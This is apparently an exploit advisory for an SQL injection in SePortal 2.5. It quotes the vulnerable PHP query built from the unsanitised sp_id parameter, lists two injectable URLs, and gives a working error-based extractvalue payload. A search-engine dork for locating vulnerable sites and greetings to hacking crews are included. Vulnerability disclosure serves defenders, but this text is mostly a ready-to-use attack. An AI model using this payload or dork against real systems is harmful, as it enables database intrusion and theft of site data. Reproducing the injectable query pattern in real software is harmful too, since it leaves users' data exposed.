44 lines
No EOL
1.3 KiB
Text
Executable file
44 lines
No EOL
1.3 KiB
Text
Executable file
####################################################################
|
|
Exploit: SePortal 2.5 Sql Injection Vulnerabilty
|
|
Author: jsass
|
|
Date : 19\03\2014
|
|
Contact Twitter: @Kwsecurity
|
|
Script: http://www.seportal.org/
|
|
version: 2.5
|
|
Tested on: Linux Ubuntu 12.4 & Windows 7
|
|
Dork : "Powered by SePortal 2.5"
|
|
|
|
//** Searching And Analysis By Kuwaity Crew **\\
|
|
|
|
####################################################################
|
|
SQL INJECTION Vulnerabilty
|
|
|
|
code :
|
|
$main_template = 'staticpages';
|
|
|
|
define('GET_CACHES', 1);
|
|
define('ROOT_PATH', './');
|
|
define('GET_USER_ONLINE', 1);
|
|
define('GET_STATS_BOX', 1);
|
|
include(ROOT_PATH.'global.php');
|
|
require(ROOT_PATH.'includes/sessions.php');
|
|
|
|
$sql = "SELECT *
|
|
FROM ".STATICPAGE_TABLE."
|
|
WHERE sp_id = '".$sp_id."'";
|
|
$result = $site_db->query($sql);
|
|
|
|
files:
|
|
staticpages.php?sp_id=(inject here)
|
|
print.php?mode=staticpage&client=printer&sp_id=(inject here)
|
|
|
|
example:
|
|
|
|
http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-
|
|
|
|
//////////////////////////////////////////////////////////////////////////////////
|
|
|
|
|
|
|
|
|
|
Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & الشبح الدموي & medo medo & sec4ever.com & is-sec.com |